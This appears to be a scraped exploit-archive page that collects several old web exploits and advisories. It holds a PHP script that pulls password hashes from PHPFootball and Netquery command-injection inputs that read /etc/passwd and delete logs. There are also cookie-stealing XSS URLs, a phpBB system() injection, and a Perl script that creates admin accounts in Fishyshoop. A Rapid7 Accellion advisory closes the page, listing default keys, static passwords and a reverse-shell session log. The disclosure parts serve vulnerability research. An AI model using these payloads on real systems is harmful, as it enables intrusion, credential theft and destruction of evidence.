10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

<?php

 

// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip

 

$host = $argv[1];

$path = $argv[2];

 

if ($argc != 3) {

 

    echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n";

    echo "by KinG-LioN -http://eurohackers.it\n";

    echo "Usage: php {$argv[0]} <host> <path>\n";

    exit;

}

else {

 

   $head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n";

   $head .= "Host: {$host}\r\n";

   $head .= "Connection: close\r\n\r\n";

 

   $fsock = fsockopen ($host,80);

   fputs ($fsock,$head);

 

   while (!feof($fsock)) {

     $cont .= fgets($fsock);

   }

    fclose($fsock);

 

    if (preg_match_all("/<td class=td>(.+?)<\/td>/",$cont,$i)) {

        print_r($i[1]);

   }

   else {

       die ("exploit error\n");

   }

}

 

 

?>

Exploit for PHPFootball versions 1.6 and below which suffer from a remote hash disclosure vulnerability in filter.php.

rgod/netquery31.txt( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit

 

software:

author site: http://www.virtech.org/tools/

 

a user can execute commands on target system by PING panel, if enabled like often happens, using pipe char on

"Ping IP Address or Host Name" input text box, example:

 

 | cat /etc/passwd

 

then you will see plain text password file

 

 | pwd

 

to see current path

 

 | rm [pwd_output]/logs/nq_log.txt

 

to delete log file...

 

disclosure of user activity:

if enabled, a user can view clear text log file through url:

 

http://[target]/[path]/logs/nq_log.txt

 

xss:

http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>

http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>

http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>

http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>

http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>

http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>

http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>

http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>

 

 

a user can use on-line Netquery installations like  proxy servers

to launch exploit from HTTP GET request panel, example:

exploiting Phpbb 2.0.15:

make a get request of

http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd

 

googledork: inurl:nquser.php

 

 

rgod

email: rgod[at]autistici.org

site: http://rgod.altervista.org

netquery 3.1 allows for remote command execution, cross site scripting, and information disclosure attacks. Detailed exploitation provided.

/webevent.txt( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

To whom it may concern,

 

I found what seems to be a bug in a program called webevent

(www.webevent.com). Webevent is a calander program that allows multiple

users to post to, and read the calander. The bug comes in from the fact that

you still have access to the perl file that is run when the administrator

runs the program for the first time. Once you run this perl file, it asks

you to enter in the admin info, e.g name, email, and....password. I've

tested version  we3.3.3, i found this version running at www.eosmith.org

(you can access firsttime at

www.eosmith.org/scripts/we3.3.3/webevent.pl?cmd=firsttime (this is used to

change the admin info and pass) and

www.eosmith.org/scripts/we3.3.3/webevent.pl?cmd=login to login.  Perhaps

earlier versions have the same problem. One way around this is to simply

delete the firsttime.pl file after you configure webevent. I also wonder if

this is a problem with whether you are using the .cgi extension or .pl

extension....also, since you have access to write events once you get admin,

i am looking into how you write to the server when you create and

submitevents.

_________________________________________________________________________

Get Your Private, Free E-mail from MSN Hotmail athttp://www.hotmail.com.

 

Share information about yourself, create your own public profile at

http://profiles.msn.com.

Webevent v3.3.3 (webevent.pl) is an online calendar which contains a remote cgi vulnerability which allows administrative access.

James Gray/fishyshoop-vuln.txt( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

Synopsis

========

The Fishyshoop shopping cart software contains a vulnerability which

allows arbitrary users to create accounts with administrator

privileges

 

Background

==========

Fishyshoop is a suite of PHP scripts allowing anybody to create an

attractive online store.

 

Affected Versions

=================

Verified on 0.930 beta. Previous versions may also be affected.

 

Impact

======

The user gains administrator privileges in the software, meaning they

are free to alter many aspects of the store, as well as committing

theft of personal information belonging to other users of the store.

 

Description

===========

pages/register/register.php takes every POST variable and inserts the

value into a new record under a field with the same name. If a new

registration is made with the variable is_admim set to 1, the account

will have administrator privileges on the site.

 

Proof of Concept

================

#!/usr/bin/perl

 

use WWW::Curl::Easy;

 

sub usage() {

  print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";

  exit();

}

 

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

 

my $fishyshoop = new WWW::Curl::Easy;

$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");

$fishyshoop->setopt(CURLOPT_POST, 1);

$fishyshoop->setopt(CURLOPT_POSTFIELDS,

"email=$UNAME&password=$PASS&is_admin=1&submit=1");

$fishyshoop->perform;

Fishyshoop Shopping Cart 0.930 Beta suffers from a vulnerability that allows arbitrary users to create accounts with administrator privileges.

H D Moore/Accellion File Transfer Appliance Multiple Vulnerabilities( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

R7-0039: Accellion File Transfer Appliance Multiple Vulnerabilities

February 7, 2011

 

-- Vulnerability Details:

 

The Accellion File Transfer Appliance, prior to version FTA_8_0_562,

suffers from a number of security flaws that can lead to a remote root

compromise.

 

 

1. Message Routing Daemon Default Encryption Keys

 

The appliance ships with UDP port 8812 allowed through the firewall. The

port correlates to an internal service that routes messages between

backend processes. To authenticate access to this service, all messages

must be encrypted with a secret key using the blowfish algorithm. The

appliance ships with two default keys, neither of which is random, which

results in an attacker being able to communicate with the internal

processes of the appliance and perform administration tasks on the

appliance itself. These two default keys are

123456789ABCDEF0123456789ABCDEF0 and 0123456789ABCDEF0123456789ABCDEF,

which are expanded with MD5 to create 448-bit blowfish keys.

 

 

2. MatchRep Daemon insert_plugin_meta_info() Command Injection

 

One of the applications that is exposed through the port 8812 message

routing service executes a system command without sanitizing the

arguments provided by the requesting application. This allows arbitrary

commands to be executed on the appliance. Combined with Issue #1, this

allows remote, unauthenticated command execution on the appliance as the

"soggycat" user, which is root equivalent (sudo rights). Rapid7 has

developed a Metasploit module[***] to chain these vulnerabilities and

will release this module in early March.

 

 

3. Remote Administration TTY Check Bypass

 

The appliance ships with a default login of admin/accellion. To reduce

the risk of remote attack, this account is not allowed to login over

Secure Shell. The implementation of this security check has a flaw and

it is still possible to configure an out-of-box Accellion appliance

remotely through SSH, simply by executing a shell without a TTY: (ssh

admin@target 'sh')

 

 

4. Static Passwords for Privileged User Accounts

 

The secure shell daemon is running by default and the system is

configured with static passwords for a number of root-equivalent

accounts. It is possible to crack these passwords and gain access to any

Accellion system with the secure shell daemon exposed. The scope of our

research did not provide time to crack these passwords, but it’s a just

a question of resource allocation. These accounts include

"soggycat","sdadmin", and the "root" user account itself.

 

 

5. Remote Access via Stale SSH Authorized Keys

 

The "soggycat" user account has a static password, as mentioned

previously, but also has two SSH keys configured for passwordless login.

These keys were generated over eight years ago and should have been

changed to reduce the risk of exposure. The comments of these two keys

are worrying as well:

 

[root@fta soggycat]# grep -i comment .ssh2/*.pub

.ssh2/theone.pub:Comment: "i am going to kiiiiiiiiiiiiill you"

.ssh2/thetwo.pub:Comment: "1024-bit dsa, kelvin@admin.c1s1.net, Mon Feb

25 2002 05:31:0

 

 

6. Weak MySQL Password for "root" Account

 

This issue is not exploitable by default due to firewall configuration

of the appliance, but it points to larger problems with the design of

the system. The root password for the MySQL server is simply "hawksql"

and all users of the system are able to read this password within

various configuration files. At the least, a non-root MySQL user account

should be used to reduce the risk of attack due to SQL  Injection flaws

in the rest of the application.

 

 

7. Internal Daemons not Bound to Loopback Interface

 

This issue is not exploitable by default due to firewall configuration

of the appliance. All internal services communicate through UDP services

bound to the 0.0.0.0 address. This exposes the internal workings of the

appliance to an attacker with network access to the system. For example,

a local user account without administrative rights would still be able

to escalate privileges by communicating with these internal services.

 

 

8. Rsync Daemon Allows Access to Privileged User Home Directory

 

This issue is not exploitable by default due to firewall configuration

of the appliance. The rsync daemon allows read/write access to the

"soggycat" home directory. Since this user account is root-equivalent,

any attacker than talk to the rsync daemon can take full control of the

appliance.

 

 

*** Information from the Metasploit module combining issues #1 and #2,

to be released in early March of 2011.

 

 

Description:

  This module exploits a chain of vulnerabilities in the Accellion

  File Transfer appliance. This appliance exposes a UDP service on

  port 8812 that acts as a gateway to the internal communication bus.

  This service uses Blowfish encryption for authentication, but the

  appliance ships with two easy to guess default authentication keys.

  This module abuses the known default encryption keys to inject a

  message into the communication bus. In order to execute arbitrary

  commands on the remote appliance, a message is injected into the bus

  destined for the 'matchrep' service. This service exposes a function

  named 'insert_plugin_meta_info' which is vulnerable to an input

  validation flaw in a call to system(). This provides access to the

  'soggycat' user account, which has sudo privileges to run the

  primary admin tool as root.

 

msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151

msf exploit(accellion_fta_mpipe2) > exploit

 

[*] Started reverse handler on 192.168.198.135:4444

[*] Command shell session 1 opened (192.168.198.135:4444 ->

192.168.198.151:42239) at 2010-11-15 23:50:35 -0600

 

id

uid=520(soggycat) gid=99(nobody) groups=99(nobody)

 

 

 

-- Vendor Response:

 

Accellion addressed item #3 on December 21st, 2010 with update FTA_8_0_540

 

Accellion addressed items #1, #2, #4, #5, #6, and #7 on January 17th,

2011 with update FTA_8_0_562

 

Item #8 is not exploitable in the default configuration and Accellion

recommends the use of SSL VPN when configuring a trusted link between

two appliances.

 

Official Changelog for FTA_8_0_562:

 

The update randomizes the following on the Accellion setup - Accellion

remote management user password, the system mysql password and the keys

used for encrypting inter-appliance communication. All internal Daemons

are now bound to Loopback Interface. The update also removes an unused

SSH key meant for remote troubleshooting login. These fixes are in

response to a security scan done by Rapid7.

 

 

-- Disclosure Timeline:

2010-10-21 - Issue #3 was reported to Accellion

2010-12-06 - Issues #1, #2, #4, #5, #6, #7, #8 reported to Accellion

2010-12-20 - A reminder the Rapid7 policy was sent to Accellion

2010-12-21 - Accellion responds with a fix date of January 2011

2010-12-21 - Accellion releases FTA_8_0_540 to address #3

2011-01-17 - Accellion releases FTA_8_0_562 to address remaining items

2011-02-07 - Detailed advisory released by Rapid7

 

 

-- Credit:

This vulnerability was discovered by HD Moore

 

 

-- About Rapid7 Security

Rapid7 provides vulnerability management, compliance and penetration

testing solutions for Web application, network and database security. In

addition to developing the NeXpose Vulnerability Management system,

Rapid7 manages the Metasploit Project and is the primary sponsor of the

W3AF web assessment tool.

 

Our vulnerability disclosure policy is available online at:

 

 http://www.rapid7.com/disclosure.jsp